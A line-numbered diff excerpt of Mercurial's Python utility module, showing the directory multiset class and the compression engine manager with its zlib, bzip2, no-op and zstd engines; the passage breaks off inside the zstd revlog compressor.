3213 '''a multiset of directory names from a dirstate or manifest'''
3216 '''a multiset of directory names from a dirstate or manifest'''
3214
3217
3215 def __init__(self, map, skip=None):
3218 def __init__(self, map, skip=None):
3216 self._dirs = {}
3219 self._dirs = {}
3217 addpath = self.addpath
3220 addpath = self.addpath
3218 if safehasattr(map, 'iteritems') and skip is not None:
3221 if safehasattr(map, 'iteritems') and skip is not None:
3219 for f, s in map.iteritems():
3222 for f, s in map.iteritems():
3220 if s[0] != skip:
3223 if s[0] != skip:
3221 addpath(f)
3224 addpath(f)
3222 else:
3225 else:
3223 for f in map:
3226 for f in map:
3224 addpath(f)
3227 addpath(f)
3225
3228
3226 def addpath(self, path):
3229 def addpath(self, path):
3227 dirs = self._dirs
3230 dirs = self._dirs
3228 for base in finddirs(path):
3231 for base in finddirs(path):
3229 if base in dirs:
3232 if base in dirs:
3230 dirs[base] += 1
3233 dirs[base] += 1
3231 return
3234 return
3232 dirs[base] = 1
3235 dirs[base] = 1
3233
3236
3234 def delpath(self, path):
3237 def delpath(self, path):
3235 dirs = self._dirs
3238 dirs = self._dirs
3236 for base in finddirs(path):
3239 for base in finddirs(path):
3237 if dirs[base] > 1:
3240 if dirs[base] > 1:
3238 dirs[base] -= 1
3241 dirs[base] -= 1
3239 return
3242 return
3240 del dirs[base]
3243 del dirs[base]
3241
3244
3242 def __iter__(self):
3245 def __iter__(self):
3243 return iter(self._dirs)
3246 return iter(self._dirs)
3244
3247
3245 def __contains__(self, d):
3248 def __contains__(self, d):
3246 return d in self._dirs
3249 return d in self._dirs
3247
3250
3248 if safehasattr(parsers, 'dirs'):
3251 if safehasattr(parsers, 'dirs'):
3249 dirs = parsers.dirs
3252 dirs = parsers.dirs
3250
3253
3251 def finddirs(path):
3254 def finddirs(path):
3252 pos = path.rfind('/')
3255 pos = path.rfind('/')
3253 while pos != -1:
3256 while pos != -1:
3254 yield path[:pos]
3257 yield path[:pos]
3255 pos = path.rfind('/', 0, pos)
3258 pos = path.rfind('/', 0, pos)
3256
3259
3257 # compression code
3260 # compression code
3258
3261
3259 SERVERROLE = 'server'
3262 SERVERROLE = 'server'
3260 CLIENTROLE = 'client'
3263 CLIENTROLE = 'client'
3261
3264
3262 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3265 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3263 (u'name', u'serverpriority',
3266 (u'name', u'serverpriority',
3264 u'clientpriority'))
3267 u'clientpriority'))
3265
3268
3266 class compressormanager(object):
3269 class compressormanager(object):
3267 """Holds registrations of various compression engines.
3270 """Holds registrations of various compression engines.
3268
3271
3269 This class essentially abstracts the differences between compression
3272 This class essentially abstracts the differences between compression
3270 engines to allow new compression formats to be added easily, possibly from
3273 engines to allow new compression formats to be added easily, possibly from
3271 extensions.
3274 extensions.
3272
3275
3273 Compressors are registered against the global instance by calling its
3276 Compressors are registered against the global instance by calling its
3274 ``register()`` method.
3277 ``register()`` method.
3275 """
3278 """
3276 def __init__(self):
3279 def __init__(self):
3277 self._engines = {}
3280 self._engines = {}
3278 # Bundle spec human name to engine name.
3281 # Bundle spec human name to engine name.
3279 self._bundlenames = {}
3282 self._bundlenames = {}
3280 # Internal bundle identifier to engine name.
3283 # Internal bundle identifier to engine name.
3281 self._bundletypes = {}
3284 self._bundletypes = {}
3282 # Revlog header to engine name.
3285 # Revlog header to engine name.
3283 self._revlogheaders = {}
3286 self._revlogheaders = {}
3284 # Wire proto identifier to engine name.
3287 # Wire proto identifier to engine name.
3285 self._wiretypes = {}
3288 self._wiretypes = {}
3286
3289
3287 def __getitem__(self, key):
3290 def __getitem__(self, key):
3288 return self._engines[key]
3291 return self._engines[key]
3289
3292
3290 def __contains__(self, key):
3293 def __contains__(self, key):
3291 return key in self._engines
3294 return key in self._engines
3292
3295
3293 def __iter__(self):
3296 def __iter__(self):
3294 return iter(self._engines.keys())
3297 return iter(self._engines.keys())
3295
3298
3296 def register(self, engine):
3299 def register(self, engine):
3297 """Register a compression engine with the manager.
3300 """Register a compression engine with the manager.
3298
3301
3299 The argument must be a ``compressionengine`` instance.
3302 The argument must be a ``compressionengine`` instance.
3300 """
3303 """
3301 if not isinstance(engine, compressionengine):
3304 if not isinstance(engine, compressionengine):
3302 raise ValueError(_('argument must be a compressionengine'))
3305 raise ValueError(_('argument must be a compressionengine'))
3303
3306
3304 name = engine.name()
3307 name = engine.name()
3305
3308
3306 if name in self._engines:
3309 if name in self._engines:
3307 raise error.Abort(_('compression engine %s already registered') %
3310 raise error.Abort(_('compression engine %s already registered') %
3308 name)
3311 name)
3309
3312
3310 bundleinfo = engine.bundletype()
3313 bundleinfo = engine.bundletype()
3311 if bundleinfo:
3314 if bundleinfo:
3312 bundlename, bundletype = bundleinfo
3315 bundlename, bundletype = bundleinfo
3313
3316
3314 if bundlename in self._bundlenames:
3317 if bundlename in self._bundlenames:
3315 raise error.Abort(_('bundle name %s already registered') %
3318 raise error.Abort(_('bundle name %s already registered') %
3316 bundlename)
3319 bundlename)
3317 if bundletype in self._bundletypes:
3320 if bundletype in self._bundletypes:
3318 raise error.Abort(_('bundle type %s already registered by %s') %
3321 raise error.Abort(_('bundle type %s already registered by %s') %
3319 (bundletype, self._bundletypes[bundletype]))
3322 (bundletype, self._bundletypes[bundletype]))
3320
3323
3321 # No external facing name declared.
3324 # No external facing name declared.
3322 if bundlename:
3325 if bundlename:
3323 self._bundlenames[bundlename] = name
3326 self._bundlenames[bundlename] = name
3324
3327
3325 self._bundletypes[bundletype] = name
3328 self._bundletypes[bundletype] = name
3326
3329
3327 wiresupport = engine.wireprotosupport()
3330 wiresupport = engine.wireprotosupport()
3328 if wiresupport:
3331 if wiresupport:
3329 wiretype = wiresupport.name
3332 wiretype = wiresupport.name
3330 if wiretype in self._wiretypes:
3333 if wiretype in self._wiretypes:
3331 raise error.Abort(_('wire protocol compression %s already '
3334 raise error.Abort(_('wire protocol compression %s already '
3332 'registered by %s') %
3335 'registered by %s') %
3333 (wiretype, self._wiretypes[wiretype]))
3336 (wiretype, self._wiretypes[wiretype]))
3334
3337
3335 self._wiretypes[wiretype] = name
3338 self._wiretypes[wiretype] = name
3336
3339
3337 revlogheader = engine.revlogheader()
3340 revlogheader = engine.revlogheader()
3338 if revlogheader and revlogheader in self._revlogheaders:
3341 if revlogheader and revlogheader in self._revlogheaders:
3339 raise error.Abort(_('revlog header %s already registered by %s') %
3342 raise error.Abort(_('revlog header %s already registered by %s') %
3340 (revlogheader, self._revlogheaders[revlogheader]))
3343 (revlogheader, self._revlogheaders[revlogheader]))
3341
3344
3342 if revlogheader:
3345 if revlogheader:
3343 self._revlogheaders[revlogheader] = name
3346 self._revlogheaders[revlogheader] = name
3344
3347
3345 self._engines[name] = engine
3348 self._engines[name] = engine
3346
3349
3347 @property
3350 @property
3348 def supportedbundlenames(self):
3351 def supportedbundlenames(self):
3349 return set(self._bundlenames.keys())
3352 return set(self._bundlenames.keys())
3350
3353
3351 @property
3354 @property
3352 def supportedbundletypes(self):
3355 def supportedbundletypes(self):
3353 return set(self._bundletypes.keys())
3356 return set(self._bundletypes.keys())
3354
3357
3355 def forbundlename(self, bundlename):
3358 def forbundlename(self, bundlename):
3356 """Obtain a compression engine registered to a bundle name.
3359 """Obtain a compression engine registered to a bundle name.
3357
3360
3358 Will raise KeyError if the bundle type isn't registered.
3361 Will raise KeyError if the bundle type isn't registered.
3359
3362
3360 Will abort if the engine is known but not available.
3363 Will abort if the engine is known but not available.
3361 """
3364 """
3362 engine = self._engines[self._bundlenames[bundlename]]
3365 engine = self._engines[self._bundlenames[bundlename]]
3363 if not engine.available():
3366 if not engine.available():
3364 raise error.Abort(_('compression engine %s could not be loaded') %
3367 raise error.Abort(_('compression engine %s could not be loaded') %
3365 engine.name())
3368 engine.name())
3366 return engine
3369 return engine
3367
3370
3368 def forbundletype(self, bundletype):
3371 def forbundletype(self, bundletype):
3369 """Obtain a compression engine registered to a bundle type.
3372 """Obtain a compression engine registered to a bundle type.
3370
3373
3371 Will raise KeyError if the bundle type isn't registered.
3374 Will raise KeyError if the bundle type isn't registered.
3372
3375
3373 Will abort if the engine is known but not available.
3376 Will abort if the engine is known but not available.
3374 """
3377 """
3375 engine = self._engines[self._bundletypes[bundletype]]
3378 engine = self._engines[self._bundletypes[bundletype]]
3376 if not engine.available():
3379 if not engine.available():
3377 raise error.Abort(_('compression engine %s could not be loaded') %
3380 raise error.Abort(_('compression engine %s could not be loaded') %
3378 engine.name())
3381 engine.name())
3379 return engine
3382 return engine
3380
3383
3381 def supportedwireengines(self, role, onlyavailable=True):
3384 def supportedwireengines(self, role, onlyavailable=True):
3382 """Obtain compression engines that support the wire protocol.
3385 """Obtain compression engines that support the wire protocol.
3383
3386
3384 Returns a list of engines in prioritized order, most desired first.
3387 Returns a list of engines in prioritized order, most desired first.
3385
3388
3386 If ``onlyavailable`` is set, filter out engines that can't be
3389 If ``onlyavailable`` is set, filter out engines that can't be
3387 loaded.
3390 loaded.
3388 """
3391 """
3389 assert role in (SERVERROLE, CLIENTROLE)
3392 assert role in (SERVERROLE, CLIENTROLE)
3390
3393
3391 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3394 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3392
3395
3393 engines = [self._engines[e] for e in self._wiretypes.values()]
3396 engines = [self._engines[e] for e in self._wiretypes.values()]
3394 if onlyavailable:
3397 if onlyavailable:
3395 engines = [e for e in engines if e.available()]
3398 engines = [e for e in engines if e.available()]
3396
3399
3397 def getkey(e):
3400 def getkey(e):
3398 # Sort first by priority, highest first. In case of tie, sort
3401 # Sort first by priority, highest first. In case of tie, sort
3399 # alphabetically. This is arbitrary, but ensures output is
3402 # alphabetically. This is arbitrary, but ensures output is
3400 # stable.
3403 # stable.
3401 w = e.wireprotosupport()
3404 w = e.wireprotosupport()
3402 return -1 * getattr(w, attr), w.name
3405 return -1 * getattr(w, attr), w.name
3403
3406
3404 return list(sorted(engines, key=getkey))
3407 return list(sorted(engines, key=getkey))
3405
3408
3406 def forwiretype(self, wiretype):
3409 def forwiretype(self, wiretype):
3407 engine = self._engines[self._wiretypes[wiretype]]
3410 engine = self._engines[self._wiretypes[wiretype]]
3408 if not engine.available():
3411 if not engine.available():
3409 raise error.Abort(_('compression engine %s could not be loaded') %
3412 raise error.Abort(_('compression engine %s could not be loaded') %
3410 engine.name())
3413 engine.name())
3411 return engine
3414 return engine
3412
3415
3413 def forrevlogheader(self, header):
3416 def forrevlogheader(self, header):
3414 """Obtain a compression engine registered to a revlog header.
3417 """Obtain a compression engine registered to a revlog header.
3415
3418
3416 Will raise KeyError if the revlog header value isn't registered.
3419 Will raise KeyError if the revlog header value isn't registered.
3417 """
3420 """
3418 return self._engines[self._revlogheaders[header]]
3421 return self._engines[self._revlogheaders[header]]
3419
3422
3420 compengines = compressormanager()
3423 compengines = compressormanager()
3421
3424
3422 class compressionengine(object):
3425 class compressionengine(object):
3423 """Base class for compression engines.
3426 """Base class for compression engines.
3424
3427
3425 Compression engines must implement the interface defined by this class.
3428 Compression engines must implement the interface defined by this class.
3426 """
3429 """
3427 def name(self):
3430 def name(self):
3428 """Returns the name of the compression engine.
3431 """Returns the name of the compression engine.
3429
3432
3430 This is the key the engine is registered under.
3433 This is the key the engine is registered under.
3431
3434
3432 This method must be implemented.
3435 This method must be implemented.
3433 """
3436 """
3434 raise NotImplementedError()
3437 raise NotImplementedError()
3435
3438
3436 def available(self):
3439 def available(self):
3437 """Whether the compression engine is available.
3440 """Whether the compression engine is available.
3438
3441
3439 The intent of this method is to allow optional compression engines
3442 The intent of this method is to allow optional compression engines
3440 that may not be available in all installations (such as engines relying
3443 that may not be available in all installations (such as engines relying
3441 on C extensions that may not be present).
3444 on C extensions that may not be present).
3442 """
3445 """
3443 return True
3446 return True
3444
3447
3445 def bundletype(self):
3448 def bundletype(self):
3446 """Describes bundle identifiers for this engine.
3449 """Describes bundle identifiers for this engine.
3447
3450
3448 If this compression engine isn't supported for bundles, returns None.
3451 If this compression engine isn't supported for bundles, returns None.
3449
3452
3450 If this engine can be used for bundles, returns a 2-tuple of strings of
3453 If this engine can be used for bundles, returns a 2-tuple of strings of
3451 the user-facing "bundle spec" compression name and an internal
3454 the user-facing "bundle spec" compression name and an internal
3452 identifier used to denote the compression format within bundles. To
3455 identifier used to denote the compression format within bundles. To
3453 exclude the name from external usage, set the first element to ``None``.
3456 exclude the name from external usage, set the first element to ``None``.
3454
3457
3455 If bundle compression is supported, the class must also implement
3458 If bundle compression is supported, the class must also implement
3456 ``compressstream`` and `decompressorreader``.
3459 ``compressstream`` and `decompressorreader``.
3457
3460
3458 The docstring of this method is used in the help system to tell users
3461 The docstring of this method is used in the help system to tell users
3459 about this engine.
3462 about this engine.
3460 """
3463 """
3461 return None
3464 return None
3462
3465
3463 def wireprotosupport(self):
3466 def wireprotosupport(self):
3464 """Declare support for this compression format on the wire protocol.
3467 """Declare support for this compression format on the wire protocol.
3465
3468
3466 If this compression engine isn't supported for compressing wire
3469 If this compression engine isn't supported for compressing wire
3467 protocol payloads, returns None.
3470 protocol payloads, returns None.
3468
3471
3469 Otherwise, returns ``compenginewireprotosupport`` with the following
3472 Otherwise, returns ``compenginewireprotosupport`` with the following
3470 fields:
3473 fields:
3471
3474
3472 * String format identifier
3475 * String format identifier
3473 * Integer priority for the server
3476 * Integer priority for the server
3474 * Integer priority for the client
3477 * Integer priority for the client
3475
3478
3476 The integer priorities are used to order the advertisement of format
3479 The integer priorities are used to order the advertisement of format
3477 support by server and client. The highest integer is advertised
3480 support by server and client. The highest integer is advertised
3478 first. Integers with non-positive values aren't advertised.
3481 first. Integers with non-positive values aren't advertised.
3479
3482
3480 The priority values are somewhat arbitrary and only used for default
3483 The priority values are somewhat arbitrary and only used for default
3481 ordering. The relative order can be changed via config options.
3484 ordering. The relative order can be changed via config options.
3482
3485
3483 If wire protocol compression is supported, the class must also implement
3486 If wire protocol compression is supported, the class must also implement
3484 ``compressstream`` and ``decompressorreader``.
3487 ``compressstream`` and ``decompressorreader``.
3485 """
3488 """
3486 return None
3489 return None
3487
3490
3488 def revlogheader(self):
3491 def revlogheader(self):
3489 """Header added to revlog chunks that identifies this engine.
3492 """Header added to revlog chunks that identifies this engine.
3490
3493
3491 If this engine can be used to compress revlogs, this method should
3494 If this engine can be used to compress revlogs, this method should
3492 return the bytes used to identify chunks compressed with this engine.
3495 return the bytes used to identify chunks compressed with this engine.
3493 Else, the method should return ``None`` to indicate it does not
3496 Else, the method should return ``None`` to indicate it does not
3494 participate in revlog compression.
3497 participate in revlog compression.
3495 """
3498 """
3496 return None
3499 return None
3497
3500
3498 def compressstream(self, it, opts=None):
3501 def compressstream(self, it, opts=None):
3499 """Compress an iterator of chunks.
3502 """Compress an iterator of chunks.
3500
3503
3501 The method receives an iterator (ideally a generator) of chunks of
3504 The method receives an iterator (ideally a generator) of chunks of
3502 bytes to be compressed. It returns an iterator (ideally a generator)
3505 bytes to be compressed. It returns an iterator (ideally a generator)
3503 of bytes of chunks representing the compressed output.
3506 of bytes of chunks representing the compressed output.
3504
3507
3505 Optionally accepts an argument defining how to perform compression.
3508 Optionally accepts an argument defining how to perform compression.
3506 Each engine treats this argument differently.
3509 Each engine treats this argument differently.
3507 """
3510 """
3508 raise NotImplementedError()
3511 raise NotImplementedError()
3509
3512
3510 def decompressorreader(self, fh):
3513 def decompressorreader(self, fh):
3511 """Perform decompression on a file object.
3514 """Perform decompression on a file object.
3512
3515
3513 Argument is an object with a ``read(size)`` method that returns
3516 Argument is an object with a ``read(size)`` method that returns
3514 compressed data. Return value is an object with a ``read(size)`` that
3517 compressed data. Return value is an object with a ``read(size)`` that
3515 returns uncompressed data.
3518 returns uncompressed data.
3516 """
3519 """
3517 raise NotImplementedError()
3520 raise NotImplementedError()
3518
3521
3519 def revlogcompressor(self, opts=None):
3522 def revlogcompressor(self, opts=None):
3520 """Obtain an object that can be used to compress revlog entries.
3523 """Obtain an object that can be used to compress revlog entries.
3521
3524
3522 The object has a ``compress(data)`` method that compresses binary
3525 The object has a ``compress(data)`` method that compresses binary
3523 data. This method returns compressed binary data or ``None`` if
3526 data. This method returns compressed binary data or ``None`` if
3524 the data could not be compressed (too small, not compressible, etc).
3527 the data could not be compressed (too small, not compressible, etc).
3525 The returned data should have a header uniquely identifying this
3528 The returned data should have a header uniquely identifying this
3526 compression format so decompression can be routed to this engine.
3529 compression format so decompression can be routed to this engine.
3527 This header should be identified by the ``revlogheader()`` return
3530 This header should be identified by the ``revlogheader()`` return
3528 value.
3531 value.
3529
3532
3530 The object has a ``decompress(data)`` method that decompresses
3533 The object has a ``decompress(data)`` method that decompresses
3531 data. The method will only be called if ``data`` begins with
3534 data. The method will only be called if ``data`` begins with
3532 ``revlogheader()``. The method should return the raw, uncompressed
3535 ``revlogheader()``. The method should return the raw, uncompressed
3533 data or raise a ``RevlogError``.
3536 data or raise a ``RevlogError``.
3534
3537
3535 The object is reusable but is not thread safe.
3538 The object is reusable but is not thread safe.
3536 """
3539 """
3537 raise NotImplementedError()
3540 raise NotImplementedError()
3538
3541
3539 class _zlibengine(compressionengine):
3542 class _zlibengine(compressionengine):
3540 def name(self):
3543 def name(self):
3541 return 'zlib'
3544 return 'zlib'
3542
3545
3543 def bundletype(self):
3546 def bundletype(self):
3544 """zlib compression using the DEFLATE algorithm.
3547 """zlib compression using the DEFLATE algorithm.
3545
3548
3546 All Mercurial clients should support this format. The compression
3549 All Mercurial clients should support this format. The compression
3547 algorithm strikes a reasonable balance between compression ratio
3550 algorithm strikes a reasonable balance between compression ratio
3548 and size.
3551 and size.
3549 """
3552 """
3550 return 'gzip', 'GZ'
3553 return 'gzip', 'GZ'
3551
3554
3552 def wireprotosupport(self):
3555 def wireprotosupport(self):
3553 return compewireprotosupport('zlib', 20, 20)
3556 return compewireprotosupport('zlib', 20, 20)
3554
3557
3555 def revlogheader(self):
3558 def revlogheader(self):
3556 return 'x'
3559 return 'x'
3557
3560
3558 def compressstream(self, it, opts=None):
3561 def compressstream(self, it, opts=None):
3559 opts = opts or {}
3562 opts = opts or {}
3560
3563
3561 z = zlib.compressobj(opts.get('level', -1))
3564 z = zlib.compressobj(opts.get('level', -1))
3562 for chunk in it:
3565 for chunk in it:
3563 data = z.compress(chunk)
3566 data = z.compress(chunk)
3564 # Not all calls to compress emit data. It is cheaper to inspect
3567 # Not all calls to compress emit data. It is cheaper to inspect
3565 # here than to feed empty chunks through generator.
3568 # here than to feed empty chunks through generator.
3566 if data:
3569 if data:
3567 yield data
3570 yield data
3568
3571
3569 yield z.flush()
3572 yield z.flush()
3570
3573
3571 def decompressorreader(self, fh):
3574 def decompressorreader(self, fh):
3572 def gen():
3575 def gen():
3573 d = zlib.decompressobj()
3576 d = zlib.decompressobj()
3574 for chunk in filechunkiter(fh):
3577 for chunk in filechunkiter(fh):
3575 while chunk:
3578 while chunk:
3576 # Limit output size to limit memory.
3579 # Limit output size to limit memory.
3577 yield d.decompress(chunk, 2 ** 18)
3580 yield d.decompress(chunk, 2 ** 18)
3578 chunk = d.unconsumed_tail
3581 chunk = d.unconsumed_tail
3579
3582
3580 return chunkbuffer(gen())
3583 return chunkbuffer(gen())
3581
3584
3582 class zlibrevlogcompressor(object):
3585 class zlibrevlogcompressor(object):
3583 def compress(self, data):
3586 def compress(self, data):
3584 insize = len(data)
3587 insize = len(data)
3585 # Caller handles empty input case.
3588 # Caller handles empty input case.
3586 assert insize > 0
3589 assert insize > 0
3587
3590
3588 if insize < 44:
3591 if insize < 44:
3589 return None
3592 return None
3590
3593
3591 elif insize <= 1000000:
3594 elif insize <= 1000000:
3592 compressed = zlib.compress(data)
3595 compressed = zlib.compress(data)
3593 if len(compressed) < insize:
3596 if len(compressed) < insize:
3594 return compressed
3597 return compressed
3595 return None
3598 return None
3596
3599
3597 # zlib makes an internal copy of the input buffer, doubling
3600 # zlib makes an internal copy of the input buffer, doubling
3598 # memory usage for large inputs. So do streaming compression
3601 # memory usage for large inputs. So do streaming compression
3599 # on large inputs.
3602 # on large inputs.
3600 else:
3603 else:
3601 z = zlib.compressobj()
3604 z = zlib.compressobj()
3602 parts = []
3605 parts = []
3603 pos = 0
3606 pos = 0
3604 while pos < insize:
3607 while pos < insize:
3605 pos2 = pos + 2**20
3608 pos2 = pos + 2**20
3606 parts.append(z.compress(data[pos:pos2]))
3609 parts.append(z.compress(data[pos:pos2]))
3607 pos = pos2
3610 pos = pos2
3608 parts.append(z.flush())
3611 parts.append(z.flush())
3609
3612
3610 if sum(map(len, parts)) < insize:
3613 if sum(map(len, parts)) < insize:
3611 return ''.join(parts)
3614 return ''.join(parts)
3612 return None
3615 return None
3613
3616
3614 def decompress(self, data):
3617 def decompress(self, data):
3615 try:
3618 try:
3616 return zlib.decompress(data)
3619 return zlib.decompress(data)
3617 except zlib.error as e:
3620 except zlib.error as e:
3618 raise error.RevlogError(_('revlog decompress error: %s') %
3621 raise error.RevlogError(_('revlog decompress error: %s') %
3619 forcebytestr(e))
3622 forcebytestr(e))
3620
3623
3621 def revlogcompressor(self, opts=None):
3624 def revlogcompressor(self, opts=None):
3622 return self.zlibrevlogcompressor()
3625 return self.zlibrevlogcompressor()
3623
3626
3624 compengines.register(_zlibengine())
3627 compengines.register(_zlibengine())
3625
3628
3626 class _bz2engine(compressionengine):
3629 class _bz2engine(compressionengine):
3627 def name(self):
3630 def name(self):
3628 return 'bz2'
3631 return 'bz2'
3629
3632
3630 def bundletype(self):
3633 def bundletype(self):
3631 """An algorithm that produces smaller bundles than ``gzip``.
3634 """An algorithm that produces smaller bundles than ``gzip``.
3632
3635
3633 All Mercurial clients should support this format.
3636 All Mercurial clients should support this format.
3634
3637
3635 This engine will likely produce smaller bundles than ``gzip`` but
3638 This engine will likely produce smaller bundles than ``gzip`` but
3636 will be significantly slower, both during compression and
3639 will be significantly slower, both during compression and
3637 decompression.
3640 decompression.
3638
3641
3639 If available, the ``zstd`` engine can yield similar or better
3642 If available, the ``zstd`` engine can yield similar or better
3640 compression at much higher speeds.
3643 compression at much higher speeds.
3641 """
3644 """
3642 return 'bzip2', 'BZ'
3645 return 'bzip2', 'BZ'
3643
3646
3644 # We declare a protocol name but don't advertise by default because
3647 # We declare a protocol name but don't advertise by default because
3645 # it is slow.
3648 # it is slow.
3646 def wireprotosupport(self):
3649 def wireprotosupport(self):
3647 return compewireprotosupport('bzip2', 0, 0)
3650 return compewireprotosupport('bzip2', 0, 0)
3648
3651
3649 def compressstream(self, it, opts=None):
3652 def compressstream(self, it, opts=None):
3650 opts = opts or {}
3653 opts = opts or {}
3651 z = bz2.BZ2Compressor(opts.get('level', 9))
3654 z = bz2.BZ2Compressor(opts.get('level', 9))
3652 for chunk in it:
3655 for chunk in it:
3653 data = z.compress(chunk)
3656 data = z.compress(chunk)
3654 if data:
3657 if data:
3655 yield data
3658 yield data
3656
3659
3657 yield z.flush()
3660 yield z.flush()
3658
3661
3659 def decompressorreader(self, fh):
3662 def decompressorreader(self, fh):
3660 def gen():
3663 def gen():
3661 d = bz2.BZ2Decompressor()
3664 d = bz2.BZ2Decompressor()
3662 for chunk in filechunkiter(fh):
3665 for chunk in filechunkiter(fh):
3663 yield d.decompress(chunk)
3666 yield d.decompress(chunk)
3664
3667
3665 return chunkbuffer(gen())
3668 return chunkbuffer(gen())
3666
3669
3667 compengines.register(_bz2engine())
3670 compengines.register(_bz2engine())
3668
3671
3669 class _truncatedbz2engine(compressionengine):
3672 class _truncatedbz2engine(compressionengine):
3670 def name(self):
3673 def name(self):
3671 return 'bz2truncated'
3674 return 'bz2truncated'
3672
3675
3673 def bundletype(self):
3676 def bundletype(self):
3674 return None, '_truncatedBZ'
3677 return None, '_truncatedBZ'
3675
3678
3676 # We don't implement compressstream because it is hackily handled elsewhere.
3679 # We don't implement compressstream because it is hackily handled elsewhere.
3677
3680
3678 def decompressorreader(self, fh):
3681 def decompressorreader(self, fh):
3679 def gen():
3682 def gen():
3680 # The input stream doesn't have the 'BZ' header. So add it back.
3683 # The input stream doesn't have the 'BZ' header. So add it back.
3681 d = bz2.BZ2Decompressor()
3684 d = bz2.BZ2Decompressor()
3682 d.decompress('BZ')
3685 d.decompress('BZ')
3683 for chunk in filechunkiter(fh):
3686 for chunk in filechunkiter(fh):
3684 yield d.decompress(chunk)
3687 yield d.decompress(chunk)
3685
3688
3686 return chunkbuffer(gen())
3689 return chunkbuffer(gen())
3687
3690
3688 compengines.register(_truncatedbz2engine())
3691 compengines.register(_truncatedbz2engine())
3689
3692
3690 class _noopengine(compressionengine):
3693 class _noopengine(compressionengine):
3691 def name(self):
3694 def name(self):
3692 return 'none'
3695 return 'none'
3693
3696
3694 def bundletype(self):
3697 def bundletype(self):
3695 """No compression is performed.
3698 """No compression is performed.
3696
3699
3697 Use this compression engine to explicitly disable compression.
3700 Use this compression engine to explicitly disable compression.
3698 """
3701 """
3699 return 'none', 'UN'
3702 return 'none', 'UN'
3700
3703
3701 # Clients always support uncompressed payloads. Servers don't because
3704 # Clients always support uncompressed payloads. Servers don't because
3702 # unless you are on a fast network, uncompressed payloads can easily
3705 # unless you are on a fast network, uncompressed payloads can easily
3703 # saturate your network pipe.
3706 # saturate your network pipe.
3704 def wireprotosupport(self):
3707 def wireprotosupport(self):
3705 return compewireprotosupport('none', 0, 10)
3708 return compewireprotosupport('none', 0, 10)
3706
3709
3707 # We don't implement revlogheader because it is handled specially
3710 # We don't implement revlogheader because it is handled specially
3708 # in the revlog class.
3711 # in the revlog class.
3709
3712
3710 def compressstream(self, it, opts=None):
3713 def compressstream(self, it, opts=None):
3711 return it
3714 return it
3712
3715
3713 def decompressorreader(self, fh):
3716 def decompressorreader(self, fh):
3714 return fh
3717 return fh
3715
3718
3716 class nooprevlogcompressor(object):
3719 class nooprevlogcompressor(object):
3717 def compress(self, data):
3720 def compress(self, data):
3718 return None
3721 return None
3719
3722
3720 def revlogcompressor(self, opts=None):
3723 def revlogcompressor(self, opts=None):
3721 return self.nooprevlogcompressor()
3724 return self.nooprevlogcompressor()
3722
3725
3723 compengines.register(_noopengine())
3726 compengines.register(_noopengine())
3724
3727
3725 class _zstdengine(compressionengine):
3728 class _zstdengine(compressionengine):
3726 def name(self):
3729 def name(self):
3727 return 'zstd'
3730 return 'zstd'
3728
3731
3729 @propertycache
3732 @propertycache
3730 def _module(self):
3733 def _module(self):
3731 # Not all installs have the zstd module available. So defer importing
3734 # Not all installs have the zstd module available. So defer importing
3732 # until first access.
3735 # until first access.
3733 try:
3736 try:
3734 from . import zstd
3737 from . import zstd
3735 # Force delayed import.
3738 # Force delayed import.
3736 zstd.__version__
3739 zstd.__version__
3737 return zstd
3740 return zstd
3738 except ImportError:
3741 except ImportError:
3739 return None
3742 return None
3740
3743
3741 def available(self):
3744 def available(self):
3742 return bool(self._module)
3745 return bool(self._module)
3743
3746
3744 def bundletype(self):
3747 def bundletype(self):
3745 """A modern compression algorithm that is fast and highly flexible.
3748 """A modern compression algorithm that is fast and highly flexible.
3746
3749
3747 Only supported by Mercurial 4.1 and newer clients.
3750 Only supported by Mercurial 4.1 and newer clients.
3748
3751
3749 With the default settings, zstd compression is both faster and yields
3752 With the default settings, zstd compression is both faster and yields
3750 better compression than ``gzip``. It also frequently yields better
3753 better compression than ``gzip``. It also frequently yields better
3751 compression than ``bzip2`` while operating at much higher speeds.
3754 compression than ``bzip2`` while operating at much higher speeds.
3752
3755
3753 If this engine is available and backwards compatibility is not a
3756 If this engine is available and backwards compatibility is not a
3754 concern, it is likely the best available engine.
3757 concern, it is likely the best available engine.
3755 """
3758 """
3756 return 'zstd', 'ZS'
3759 return 'zstd', 'ZS'
3757
3760
3758 def wireprotosupport(self):
3761 def wireprotosupport(self):
3759 return compewireprotosupport('zstd', 50, 50)
3762 return compewireprotosupport('zstd', 50, 50)
3760
3763
3761 def revlogheader(self):
3764 def revlogheader(self):
3762 return '\x28'
3765 return '\x28'
3763
3766
3764 def compressstream(self, it, opts=None):
3767 def compressstream(self, it, opts=None):
3765 opts = opts or {}
3768 opts = opts or {}
3766 # zstd level 3 is almost always significantly faster than zlib
3769 # zstd level 3 is almost always significantly faster than zlib
3767 # while providing no worse compression. It strikes a good balance
3770 # while providing no worse compression. It strikes a good balance
3768 # between speed and compression.
3771 # between speed and compression.
3769 level = opts.get('level', 3)
3772 level = opts.get('level', 3)
3770
3773
3771 zstd = self._module
3774 zstd = self._module
3772 z = zstd.ZstdCompressor(level=level).compressobj()
3775 z = zstd.ZstdCompressor(level=level).compressobj()
3773 for chunk in it:
3776 for chunk in it:
3774 data = z.compress(chunk)
3777 data = z.compress(chunk)
3775 if data:
3778 if data:
3776 yield data
3779 yield data
3777
3780
3778 yield z.flush()
3781 yield z.flush()
3779
3782
3780 def decompressorreader(self, fh):
3783 def decompressorreader(self, fh):
3781 zstd = self._module
3784 zstd = self._module
3782 dctx = zstd.ZstdDecompressor()
3785 dctx = zstd.ZstdDecompressor()
3783 return chunkbuffer(dctx.read_from(fh))
3786 return chunkbuffer(dctx.read_from(fh))
3784
3787
3785 class zstdrevlogcompressor(object):
3788 class zstdrevlogcompressor(object):
3786 def __init__(self, zstd, level=3):
3789 def __init__(self, zstd, level=3):
3787 # Writing the content size adds a few bytes to the output. However,
3790 # Writing the content size adds a few bytes to the output. However,
3788 # it allows decompression to be more optimal since we can
3791 # it allows decompression to be more optimal since we can
3789 # pre-allocate a buffer to hold the result.
3792 # pre-allocate a buffer to hold the result.
3790 self._cctx = zstd.ZstdCompressor(level=level,
3793 self._cctx = zstd.ZstdCompressor(level=level,
3791 write_content_size=True)
3794 write_content_size=True)
3792 self._dctx = zstd.ZstdDecompressor()
3795 self._dctx = zstd.ZstdDecompressor()
